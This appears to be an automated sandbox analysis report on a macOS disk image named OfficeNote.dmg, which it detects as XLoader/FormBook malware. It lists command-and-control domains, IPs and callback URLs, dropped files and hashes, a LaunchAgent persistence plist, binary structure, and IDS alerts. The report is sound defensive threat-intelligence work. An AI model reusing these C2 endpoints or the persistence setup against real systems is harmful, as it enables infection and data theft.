Domain Accounts	At (Linux)	1 Plist Modification	1 Plist Modification	21 Hidden Files and Directories	1 Credentials from Web Browsers	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Invalid Code Signature	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Code Signing	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 File Deletion	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Name	IP	Active	Malicious	Reputation
dalilamendezgallery.com	192.0.78.25	true	true	unknown
www.xc3e3.fun	104.21.71.149	true	true	unknown
www.kuailesms.net	146.148.179.231	true	true	unknown
mixova.art	185.215.4.57	true	true	unknown
www.spv88.online	188.114.96.3	true	true	unknown
www.growind.info	66.29.151.121	true	true	unknown
74858af1f.n.fnvip100.com	137.220.225.54	true	true	unknown
greaterudition.com	34.102.136.180	true	false	unknown
www.gms-medika.com	172.67.200.50	true	true	unknown
skindocworld.com	192.0.78.25	true	true	unknown
www.brioche-amsterdam.com	104.21.26.182	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
www.familia-gava.com	unknown	unknown	false	unknown
www.greaterudition.com	unknown	unknown	false	unknown
www.sportbettingapps.app	unknown	unknown	false	unknown
www.mixova.art	unknown	unknown	false	unknown
www.activ-ketodietakjsy620.cloud	unknown	unknown	false	unknown
www.qq9122.com	unknown	unknown	false	unknown
www.cdf63.com	unknown	unknown	false	unknown
www.corkagenexus.com	unknown	unknown	false	unknown
www.skindocworld.com	unknown	unknown	false	unknown
www.dalilamendezgallery.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Reputation
http://www.growind.info/e8gp/?xhc0L2=61qgLCVmwiYhY1k2gwUpsEeOxq+LhUlbpqnlW+J5fZEqilNytgGabqEunmU6yZQuNKMgwmW03tX/qZ3Mu/pSbEMh+Akeuw6b40Ne&HDp=njTTUjRhh2_	true	unknown
http://www.skindocworld.com/e8gp/?xhc0L2=dztg7irefDCp7IGdZLb3CPbd7rvvYQvJkQuTo0GRPbERPNhZiuoJEigDg44bvuUZ82CvJV/5juSfRsm8qKEkcmvXDbHqPdO8Wxhf&HDp=njTTUjRhh2_	true	unknown
http://www.qq9122.com/e8gp/	true	unknown
http://www.brioche-amsterdam.com/e8gp/?xhc0L2=Ab6vRTzAMfHQY4XdwhW7wtbhx8W7NHCMdlU0DyCHtsf2UMNfDFsTdFwISOrS2vaK2PSRorBz9aFTNso43ncynBJgfEZaaeKMLRlW&HDp=njTTUjRhh2_	true	unknown
http://www.mixova.art/e8gp/?xhc0L2=1Opkd6I8Hw0hqQTwYPZT5403YNS0Jo6p5aB/dYESwIKFU9GO+2rSmzXSuAC0uGbmcK86ZqWa9QkknXVi4rO7fYkC/qyHgn6fvkxK&HDp=njTTUjRhh2_	true	unknown
http://www.spv88.online/e8gp/?xhc0L2=6eBq3For9zap+5OTHjEdFb+cgnEpiUG6j5oni2dGM+5uq+KZcTGOclOU9yeLFqZHdTK7cjefMM3qdKtOujwsYhywHZZM/a68NQPS&HDp=njTTUjRhh2_	true	unknown
http://www.qq9122.com/e8gp/?xhc0L2=G6GjsaNDtV5maraECMSXUn3FSCtRKV1Yp4GXMeLxBdS68XFM8fFuCoaVmKMc0ET9CHVV/OPPkHt3Jw9s8vpJASqqNeAMqtPwvvA9&HDp=njTTUjRhh2_	true	unknown
http://www.kuailesms.net/e8gp/?xhc0L2=xGycCDLXwFlD+OnV5wrRAoWjiweuMz9Ju1yK0Of5U14HoqAK3y5ZJ513OPQC3HV1XCE6HQHGmC1hedXCJaVT5rHtWdIcIJC/itwx&HDp=njTTUjRhh2_	true	unknown
http://www.dalilamendezgallery.com/e8gp/?xhc0L2=7ohy4xQNzEvyJOUXqQIxQK/6m66/e2xRAEQtQV87DDNIcHu63YMrZBFkAKfGBEVRxo3xV5Yf4dXQnrjI8dL8Qf9nzSQEAzsJ3BFp&HDp=njTTUjRhh2_	true	unknown
http://www.dalilamendezgallery.com/e8gp/?xhc0L2=7ohy4xQNzEvyJOUXqQIxQK/6m66/e2xRAEQtQV87DDNIcHu63YMrZBFkAKfGBEVRxo3xV5Yf4dXQnrjI8dL8Qf9nzSQEAzsJ3BGl&HDp=njTTUjRhh2_	true	unknown
http://www.brioche-amsterdam.com/e8gp/	true	unknown
http://www.gms-medika.com/e8gp/?xhc0L2=oNopsgYov2zFzHOYq9j5/w4HKjdoqPfC5Sc2oZNy6d0vNaNSOmDp+kl5mvv/3C1TW3Bgx4jTjeuRFSZZthnMZyYwXoq0jNZF75DM&HDp=njTTUjRhh2_	true	unknown
http://www.kuailesms.net/e8gp/?xhc0L2=xGycCDLXwFlD+OnV5wrRAoWjiweuMz9Ju1yK0Of5U14HoqAK3y5ZJ513OPQC3HV1XCE6HQHGmC1hedXCJaVT5rHtWdIcIJC/itz9&HDp=njTTUjRhh2_	true	unknown
http://www.xc3e3.fun/e8gp/	true	unknown
http://www.skindocworld.com/e8gp/	true	unknown
http://www.spv88.online/e8gp/	true	unknown
http://www.gms-medika.com/e8gp/	true	unknown
http://www.kuailesms.net/e8gp/	true	unknown
http://www.qq9122.com/e8gp/?xhc0L2=G6GjsaNDtV5maraECMSXUn3FSCtRKV1Yp4GXMeLxBdS68XFM8fFuCoaVmKMc0ET9CHVV/OPPkHt3Jw9s8vpJASqqNeAMqtPwvvDx&HDp=njTTUjRhh2_	true	unknown
http://www.xc3e3.fun/e8gp/?xhc0L2=Pv2HIUgDB7Qa+wzzBoxyDE7uYtzxjTUpRgqcrt0uAAtucffTC6N1FqpKGtHQdbXZZnJrDGurKZENAMbphLYijutqjr515/wKHFbk&HDp=njTTUjRhh2_	true	unknown
http://www.growind.info/e8gp/?xhc0L2=61qgLCVmwiYhY1k2gwUpsEeOxq+LhUlbpqnlW+J5fZEqilNytgGabqEunmU6yZQuNKMgwmW03tX/qZ3Mu/pSbEMh+Akeuw6b40OS&HDp=njTTUjRhh2_	true	unknown
http://www.greaterudition.com/e8gp/	false	unknown
http://www.greaterudition.com/e8gp/?xhc0L2=jdN2yhs3x4p58YCD4U7n/gj8BurDXSdvL7HLiEUfYbhgZbFQI7BchpBTg2Lpqi+Gn9rfegZCc3gTj3ynTxQL940J2lKkq4WtWM4f&HDp=njTTUjRhh2_	false	unknown
http://www.dalilamendezgallery.com/e8gp/	true	unknown
http://www.xc3e3.fun/e8gp/?xhc0L2=Pv2HIUgDB7Qa+wzzBoxyDE7uYtzxjTUpRgqcrt0uAAtucffTC6N1FqpKGtHQdbXZZnJrDGurKZENAMbphLYijutqjr515/wKHFYo&HDp=njTTUjRhh2_	true	unknown
http://www.spv88.online/e8gp/?xhc0L2=6eBq3For9zap+5OTHjEdFb+cgnEpiUG6j5oni2dGM+5uq+KZcTGOclOU9yeLFqZHdTK7cjefMM3qdKtOujwsYhywHZZM/a68NQMe&HDp=njTTUjRhh2_	true	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
137.220.225.54	74858af1f.n.fnvip100.com	Singapore	64050	BCPL-SGBGPNETGlobalASNSG	true
192.0.78.25	dalilamendezgallery.com	United States	2635	AUTOMATTICUS	true
185.215.4.57	mixova.art	Denmark	50129	TVHORADADAES	true
172.67.200.50	www.gms-medika.com	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	www.spv88.online	European Union	13335	CLOUDFLARENETUS	true
104.21.26.182	www.brioche-amsterdam.com	United States	13335	CLOUDFLARENETUS	true
34.102.136.180	greaterudition.com	United States	15169	GOOGLEUS	false
104.21.71.149	www.xc3e3.fun	United States	13335	CLOUDFLARENETUS	true
146.148.179.231	www.kuailesms.net	United States	26658	HENGTONG-IDC-LLCUS	true
66.29.151.121	www.growind.info	United States	19538	ADVANTAGECOMUS	true

Created / dropped Files

/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/Info.plist

Download File

Process:	/Users/rodrigo/73a470tO
File Type:	XML document text
Category:	dropped
Size (bytes):	792
Entropy (8bit):	5.178556023259676
Encrypted:	false
SSDEEP:	12:TMHdgo+tJVEdQiCXFnInAYwjDVhFEXa64h4oIQKKGYsH/fejphjiTAHlvlL:2dfyiwl6wNhMa64h4oRwYsH/felhusdL
MD5:	3C1D0544E2B8905CA404512D0D4E6797
SHA1:	9086E1A1A6ACA778868190E248D1895533D68FBC
SHA-256:	6F8B131D44E557F794B2094E0F0A00435E6883008C2665EEF45CFF93C74F0A32
SHA-512:	438B30494F7356F1ECFDE6878EA1CE8F6F2613FA0EA71A45B7F5EDFBD531AB27FA3D14E80A179979F406C31E92F87BB0B52207CBC5962B2D0B4A3ACAC24FF4EC
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>CFBundleDevelopmentRegion</key>..<string>en</string>..<key>CFBundleExecutable</key>..<string>wvz4oTFps</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>wvz4oTFps</string>..<key>CFBundlePackageType</key>..<string>APPL</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleVersion</key>..<string>1</string>..<key>LSMinimumSystemVersion</key>..<string>10.6</string>..<key>NSMainNibFile</key>..<string>wvz4oTFps</string>..<key>NSPrincipalClass</key>..<string>NSApplication</string>..<key>LSUIElement</key>..<true/>.</dict>.</plist>

/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps

Download File

Process:	/Users/rodrigo/73a470tO
File Type:	Mach-O 64-bit executable
Category:	dropped
Size (bytes):	131904
Entropy (8bit):	6.874955793719321
Encrypted:	false
SSDEEP:	1536:BNngrIUouBPc2fpbrG052iFiIuabXbof3hFBe4rS4Yht3tc8DiejXboGd+wQHxlL:DUVkG9DgiQ+oPk4m4Yh5tcklnQRlq9+
MD5:	C68E9AB57BFF9DE72414C83D612636DC
SHA1:	26FD638334C9C1BD111C528745C10D00AA77249D
SHA-256:	ADDA1B2139B7BBEC7F051ECB58D1015D9AC8D5552987374EC48C6598ACF54DE8
SHA-512:	B0DDE8AA21E27A5B215A360987D6B3CD3728DD9BEB50C847799545564C9969F97DE8010191E2387A180CD05824AD09105291C9410E49BBF8418A77E37BD5CF6A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XLoader, Description: Yara detected XLoader, Source: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps, Author: Joe Security
Reputation:	low
Preview:	....................@...............H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT..................>.......................................__stubs.........__TEXT..........>...............>...............................__stub_helper...__TEXT..........D...............D...............................__const.........__TEXT..........`.......@.......`...............................__unwind_info...__TEXT..................H...............................................__DATA..........................................................__nl_symbol_ptr.__DATA..........................................................__la_symbol_ptr.__DATA..............................................................H...__LINKEDIT..............@...............@......................."...0...................................(...P.......................H.......P...........................................

/Users/rodrigo/73a470tO

Download File

Process:	/Volumes/OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote
File Type:	Mach-O 64-bit executable
Category:	dropped
Size (bytes):	131904
Entropy (8bit):	6.874955793719321
Encrypted:	false
SSDEEP:	1536:BNngrIUouBPc2fpbrG052iFiIuabXbof3hFBe4rS4Yht3tc8DiejXboGd+wQHxlL:DUVkG9DgiQ+oPk4m4Yh5tcklnQRlq9+
MD5:	C68E9AB57BFF9DE72414C83D612636DC
SHA1:	26FD638334C9C1BD111C528745C10D00AA77249D
SHA-256:	ADDA1B2139B7BBEC7F051ECB58D1015D9AC8D5552987374EC48C6598ACF54DE8
SHA-512:	B0DDE8AA21E27A5B215A360987D6B3CD3728DD9BEB50C847799545564C9969F97DE8010191E2387A180CD05824AD09105291C9410E49BBF8418A77E37BD5CF6A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XLoader, Description: Yara detected XLoader, Source: /Users/rodrigo/73a470tO, Author: Joe Security
Reputation:	low
Preview:	....................@...............H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT..................>.......................................__stubs.........__TEXT..........>...............>...............................__stub_helper...__TEXT..........D...............D...............................__const.........__TEXT..........`.......@.......`...............................__unwind_info...__TEXT..................H...............................................__DATA..........................................................__nl_symbol_ptr.__DATA..........................................................__la_symbol_ptr.__DATA..............................................................H...__LINKEDIT..............@...............@......................."...0...................................(...P.......................H.......P...........................................

/Users/rodrigo/Library/LaunchAgents/com.CdoPv.wvz4oTFps.plist

Download File

Process:	/Users/rodrigo/73a470tO
File Type:	XML document text
Category:	dropped
Size (bytes):	474
Entropy (8bit):	5.25626157376949
Encrypted:	false
SSDEEP:	12:TMHdgo+tJVEdQiCXFM28Xy9NofeetYX+NEVjB:2dfyiw78XGeKOOT
MD5:	A1D60D8086EC2CDC1A41EC5C8E2EC224
SHA1:	FC9150160DF86D8CE88272261A15F3C817E367C3
SHA-256:	3B55AE2388C20B7E8FDB220391538D2F82B969DDF5FAB474814C379737CD2185
SHA-512:	700DE1431DA32CB2C429A8FFE8E08E17013BFC87821240714BA1EA49A2FD88C54E7360A814658DC0BFC4255C32C9F6FCE88102E820E7344970AF52E29766B41A
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>Label</key>..<string>com.CdoPv.wvz4oTFps</string>. <key>ProgramArguments</key>..<array>.. <string>/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps</string>.. <string>start</string>..</array>. <key>RunAtLoad</key>..<true/>. <key>KeepAlive</key>..<false/>.</dict>.</plist>

/Users/rodrigo/obdL0Dl8

Download File

Process:	/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
File Type:	SQLite 3.x database
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8390212784777835
Encrypted:	false
SSDEEP:	96:Tl2BZXeYimgeymwHCn8MouOFlvwsjjFlKLwYGApg:pEZBOHG7qdJYG+g
MD5:	A818BE0C7E58845AB4919DF2400C47CB
SHA1:	CE34F99E0654F0F6D1825A3DE839C93839093E79
SHA-256:	C3CD94F6196A26E30CB5045583DF93F715D38C7C35F99E5BBB8DEAB19EAC809E
SHA-512:	E064BF18D19287AD17C2441459FF7FD109CD80083D3C1D9165D1E52C8C850E6E777C0952F37D2F619B219276FC390E1BF7BCEDD57FC7E2437CE1E3D7694A12D0
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

/private/var/folders/lz/nsqjk8n92l30_9hwqkbhfpym0000gp/C/mds/mdsDirectory.db_

Download File

Process:	/usr/bin/security
File Type:	Mac OS X Keychain File
Category:	dropped
Size (bytes):	48908
Entropy (8bit):	3.533814637805397
Encrypted:	false
SSDEEP:	384:xSMdGleGkIG7FF3theSMVXBD0tgcNrGB5pBfbouR6/chQOnGqwc2U+v+h/:8MdGleOhpBouRwchQOnGqwc2U+v+h/
MD5:	0E4A0D1CEB2AF6F0F8D0167CE77BE2D3
SHA1:	414BA4C1DC5FC8BF53D550E296FD6F5AD669918C
SHA-256:	CCA093BCFC65E25DD77C849866E110DF72526DFFBE29D76E11E29C7D888A4030
SHA-512:	1DC5282D27C49A4B6F921BA5DFC88B8C1D32289DF00DD866F9AC6669A5A8D99AFEDA614BFFC7CF61A44375AE73E09CD52606B443B63636977C9CD2EF4FA68A20
Malicious:	false
Reputation:	low
Preview:	kych...........................`...X...p..S0..SX..Th..T...T...[...^h...........L...X...............T...........d...................t...............t...........<...............P...........0...........$...p...........l...........X.......@.......................!...%........CSSM_DL_DB_SCHEMA_INFO.....D.......................!...%........CSSM_DL_DB_SCHEMA_ATTRIBUTES...D.......................!...%........CSSM_DL_DB_SCHEMA_INDEXES......H.......................!...%....... CSSM_DL_DB_SCHEMA_PARSING_MODULE...D.......................!...%@.......MDS_CDSADIR_CSSM_RECORDTYPE....D.......................!...%@.......MDS_CDSADIR_KRMM_RECORDTYPE....D.......................!...%@.......MDS_CDSADIR_EMM_RECORDTYPE.....L.......................!...%@......"MDS_CDSADIR_EMM_PRIMARY_RECORDTYPE.....H.......................!...%@.......MDS_CDSADIR_COMMON_RECORDTYPE......L.......................!...%@......"MDS_CDSADIR_CSP_PRIMARY_RECORDTYPE.....P.......................!...%@......%MDS_CDSADIR_CSP_CAPABILITY_R

/private/var/folders/lz/nsqjk8n92l30_9hwqkbhfpym0000gp/C/mds/mdsObject.db_

Download File

Process:	/usr/bin/security
File Type:	Mac OS X Keychain File
Category:	dropped
Size (bytes):	4404
Entropy (8bit):	3.5110922853353324
Encrypted:	false
SSDEEP:	24:mFkXs98w/mBr53CEb9ujBbCYoVeA7uBEUMy733Ka2VCneWHrUZRJkWnJI4FNMOQS:m6Xsh+CLjL3Pe3T5FFEfEn8xiYuuSsS
MD5:	D3A1859E6EC593505CC882E6DEF48FC8
SHA1:	F8E6728E3E9DE477A75706FAA95CEAD9CE13CB32
SHA-256:	3EBAFA97782204A4A1D75CFEC22E15FCDEAB45B65BAB3B3E65508707E034A16C
SHA-512:	EA2A749B105759EA33408186B417359DEFFB4A3A5ED0533CB26B459C16BB3524D67EDE5C9CF0D5098921C0C0A9313FB9C2672F1E5BA48810EDA548FA3209E818
Malicious:	false
Reputation:	low
Preview:	kych.......................................d...................0...............0...p...........@...@.......................!...%........CSSM_DL_DB_SCHEMA_INFO.....D.......................!...%........CSSM_DL_DB_SCHEMA_ATTRIBUTES...D.......................!...%........CSSM_DL_DB_SCHEMA_INDEXES......H.......................!...%....... CSSM_DL_DB_SCHEMA_PARSING_MODULE...@.......................!...%@.......MDS_OBJECT_RECORDTYPE..............h........... ...`........... ...@.......................-...1...5...9...=@..............................X...............P................... ...p...........l...........d...........P...........H...........,...............h...........P.......................1...5...9...=.......M................RelationID.........P.......................1...5...9...=.......M................RelationName.......P.......................1...5...9...=.......M................RelationID.........P.......................1...5...9...=.......M................AttributeID........X....

Static File Info

General

File type:	data
Entropy (8bit):	7.995066626583155
TrID:	Disk Image (Macintosh), zlib (10501/1) 77.76% Macintosh Disk image (BZlib compressed) (2002/1) 14.83% ZLIB compressed file (1001/1) 7.41%
File name:	OfficeNote.dmg
File size:	713'338 bytes
MD5:	8f8444dc9486a7f770c34b6d7cb67c05
SHA1:	5946452d1537cf2a0e28c77fa278554ce631223c
SHA256:	453e155722ac23771d63418e39f88430b0a922bd5f4afa81dcc73db44571b79e
SHA512:	85b9692fd8decc1c9024619ce1be2c6f84d5abc220f63f7d47f209d165d47c1d93d0404248feecc3710911475d4e9aebd60bcbdec9425a8ddf12ae3a5ccfb149
SSDEEP:	12288:D5vF5OATckhe7KshQ2tMHddElddR/bDYcutdMae63qA4wBcY/Qp:D5vF587xhQ2OHddaddIdMJ4N4wBcY/
TLSH:	97E423FFA9B03898ECCDE97685A5C19E8ECE32F7116E47489B3E0D7481C9805B931527
File Content Preview:	x.s.bb``8..0.F$..K6..x...A..P......F{h..D..B...OHYb..e..4).V..o..w.n...i?.~.U].cx.....i..<...._.%.L.\....B.v..0/.b..._....n.[../........{.i....................................14.Bx...=N.A....@.P.11.Jz..'...Cp.[..J.{+.C....y..$.......?.........j....z... ..

CodeSign Information

["Executable=/Volumes/OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote","Identifier=OfficeNote","Format=app bundle with Mach-O thin (x86_64)","CodeDirectory v=20200 size=2634 flags=0x0(none) hashes=77+3 location=embedded","Library validation warning=OS X SDK version before 10.9 does not support Library Validation","VersionPlatform=1","VersionMin=657408","VersionSDK=657408","Hash type=sha256 size=32","CandidateCDHash sha1=b149f8e700125abd6815056b5e55c22cfd9e31b9","CandidateCDHashFull sha1=b149f8e700125abd6815056b5e55c22cfd9e31b9","CandidateCDHash sha256=89c128f4e6f2c50004ec9b5c83e7b847e26ef4a0","CandidateCDHashFull sha256=89c128f4e6f2c50004ec9b5c83e7b847e26ef4a0b30b0172398ca3f18c6b5495","Hash choices=sha1,sha256","CMSDigest=9b56431b11e2773112301aae22978b64482efb45845117374c92c83fdbff837e","CMSDigestType=2","Page size=4096","Launch Constraints:","None","CDHash=89c128f4e6f2c50004ec9b5c83e7b847e26ef4a0","Signature size=4859","Authority=Apple Distribution: MAIT JAKHU (54YDV8NU9C)","Authority=Apple Worldwide Developer Relations Certification Authority","Authority=Apple Root CA","Signed Time=Jul 17, 2023 at 10:58:52 PM","Info.plist entries=13","TeamIdentifier=54YDV8NU9C","Sealed Resources version=2 rules=13 files=1","Internal requirements count=1 size=172"]

Archive DMG

Archived Files

File Path	File Attributes	File Size
OfficeNote/.DS_Store		6'148 bytes
OfficeNote/.VolumeIcon.icns		221'878 bytes
OfficeNote/OfficeNote.app/Contents/Info.plist		918 bytes
OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote		335'872 bytes
OfficeNote/OfficeNote.app/Contents/Resources/OfficeNote.icns		221'878 bytes
OfficeNote/OfficeNote.app/Contents/_CodeSignature/CodeResources		2'524 bytes

Extracted Files

OfficeNote/.DS_Store

File path:	OfficeNote/.DS_Store
File size:	6'148 bytes
File type:	data

OfficeNote/.VolumeIcon.icns

File path:	OfficeNote/.VolumeIcon.icns
File size:	221'878 bytes
File type:	data

OfficeNote/OfficeNote.app/Contents/Info.plist

File path:	OfficeNote/OfficeNote.app/Contents/Info.plist
File size:	918 bytes
File type:	XML document text

Plist Content

{"CFBundleDevelopmentRegion": "en", "CFBundleExecutable": "OfficeNote", "CFBundleIconFile": "OfficeNote.icns", "CFBundleIdentifier": "OfficeNote", "CFBundleInfoDictionaryVersion": "6.0", "CFBundleName": "OfficeNote", "CFBundlePackageType": "APPL", "CFBundleShortVersionString": "1.0", "CFBundleVersion": "1", "LSMinimumSystemVersion": "10.8", "NSMainNibFile": "OfficeNote", "NSPrincipalClass": "NSApplication", "LSUIElement": true}

OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote

File path:	OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote
File size:	335'872 bytes
File type:	Mach-O 64-bit executable

Static Mach Info

General Information for header 1
Endian:	little-endian
Size:	64-bit
Architecture:	x86_64
Filetype:	execute
Nbr. of load commands:	22
Entry point:	0xB00

segment_command_64 aggregated: 4

Name	Value
segname	__PAGEZERO
vmaddr	0x0
vmsize	0x100000000
fileoff	0x0
filesize	0x0
maxprot	0x0
initprot	0x0
nsects	0
flags	0x0

Name

Value

segname

__TEXT

vmaddr

0x100000000

vmsize

0x4B000

fileoff

0x0

filesize

0x4B000

maxprot

0x7

initprot

0x5

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__text	__TEXT	0x100000B00	0x495D7	0xB00	7.9899	0x8	0x0	0	0x80000400
__stubs	__TEXT	0x10004A0D8	0x72	0x4A0D8	2.9596	0x1	0x0	0	0x80000408
__stub_helper	__TEXT	0x10004A14C	0xCE	0x4A14C	3.5460	0x2	0x0	0	0x80000400
__cstring	__TEXT	0x10004A220	0x38D	0x4A220	4.8416	0x3	0x0	0	0x2
__unwind_info	__TEXT	0x10004A5AD	0xDC	0x4A5AD	3.7876	0x0	0x0	0	0x0
__eh_frame	__TEXT	0x10004A690	0x940	0x4A690	3.4239	0x3	0x0	0	0x0

Name

Value

segname

__DATA

vmaddr

0x10004B000

vmsize

0x1000

fileoff

0x4B000

filesize

0x1000

maxprot

0x7

initprot

0x3

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__got	__DATA	0x10004B000	0x10	0x4B000	-0.0000	0x3	0x0	0	0x6
__nl_symbol_ptr	__DATA	0x10004B010	0x10	0x4B010	-0.0000	0x3	0x0	0	0x6
__la_symbol_ptr	__DATA	0x10004B020	0x98	0x4B020	2.5735	0x3	0x0	0	0x7
__objc_imageinfo	__DATA	0x10004B0B8	0x8	0x4B0B8	-0.0000	0x2	0x0	0	0x0
__objc_selrefs	__DATA	0x10004B0C0	0x80	0x4B0C0	2.5429	0x3	0x0	0	0x10000005
__objc_msgrefs	__DATA	0x10004B140	0x20	0x4B140	1.3738	0x4	0x0	0	0x0
__objc_classrefs	__DATA	0x10004B160	0x20	0x4B160	-0.0000	0x3	0x0	0	0x10000000
__cfstring	__DATA	0x10004B180	0x1A0	0x4B180	1.6007	0x3	0x0	0	0x0
__data	__DATA	0x10004B320	0x110	0x4B320	2.8005	0x3	0x0	0	0x0

Name	Value
segname	__LINKEDIT
vmaddr	0x10004C000
vmsize	0x6000
fileoff	0x4C000
filesize	0x6000
maxprot	0x7
initprot	0x1
nsects	0
flags	0x0

dyld_info_command aggregated: 1

Name	Value
rebase_off	311296
rebase_size	24
bind_off	311320
bind_size	288
weak_bind_off	0
weak_bind_size	0
lazy_bind_off	311608
lazy_bind_size	336
export_off	311944
export_size	48

symtab_command aggregated: 1

Name	Value
symoff	312128
nsyms	30
stroff	312776
strsize	464

dysymtab_command aggregated: 1

Name	Value
ilocalsym	0
nlocalsym	1
iextdefsym	1
nextdefsym	1
iundefsym	2
nundefsym	28
tocoff	0
ntoc	0
modtaboff	0
nmodtab	0
extrefsymoff	0
nextrefsyms	0
indirectsymoff	312608
nindirectsyms	42
extreloff	0
nextrel	0
locreloff	0
nlocrel	0

dylinker_command aggregated: 1

Name

Value

name

Datas

/usr/lib/dyld

uuid_command aggregated: 1

Name	Value
uuid	b'@\xb5\xde:/\xb019\x9c4;)\xc9t\x03\x8d'

version_min_command aggregated: 1

Name	Value
version	657408
sdk	657408

source_version_command aggregated: 1

Name	Value
version	0

entry_point_command aggregated: 1

Name	Value
entryoff	2816
stacksize	0

dylib_command aggregated: 6

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

19.0.0

compatibility_version

1.0.0

Datas

/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

169.3.0

compatibility_version

1.0.0

Datas

/usr/lib/libSystem.B.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

228.0.0

compatibility_version

1.0.0

Datas

/usr/lib/libobjc.A.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

744.1.0

compatibility_version

150.0.0

Datas

/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

945.11.0

compatibility_version

300.0.0

Datas

/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1187.33.0

compatibility_version

45.0.0

Datas

/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit

linkedit_data_command aggregated: 4

Name	Value
dataoff	311992
datasize	72

Name	Value
dataoff	312064
datasize	0

Name	Value
dataoff	312064
datasize	64

Name	Value
dataoff	313248
datasize	22624

Internal Symbols

_OBJC_CLASS_$_NSAlert

_OBJC_CLASS_$_NSBundle

_OBJC_CLASS_$_NSFileManager

_OBJC_CLASS_$_NSString

___CFConstantStringClassReference

___bzero

___stack_chk_fail

___stack_chk_guard

__dyld_get_image_header

__dyld_get_image_name

__mh_execute_header

_free

_fstat$INODE64

_geteuid

_getpwuid

_mach_task_self_

_malloc

_memcpy

_objc_msgSend

_objc_msgSend_fixup

_open

_ptrace

_read

_strlen

_system

_vm_allocate

_vm_protect

_write

dyld_stub_binder

radr://5614542

External Symbols

___bzero

___stack_chk_fail

__dyld_get_image_header

__dyld_get_image_name

_free

_fstat$INODE64

_geteuid

_getpwuid

_malloc

_memcpy

_objc_msgSend

_open

_ptrace

_read

_strlen

_system

_vm_allocate

_vm_protect

_write

OfficeNote/OfficeNote.app/Contents/_CodeSignature/CodeResources

File path:	OfficeNote/OfficeNote.app/Contents/_CodeSignature/CodeResources
File size:	2'524 bytes
File type:	XML document text

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.0.56192.0.78.2549173802031412 08/23/23-14:54:30.991426	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49173	80	192.168.0.56	192.0.78.25
192.168.0.56192.0.78.2549167802031412 08/23/23-14:52:59.880394	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49167	80	192.168.0.56	192.0.78.25
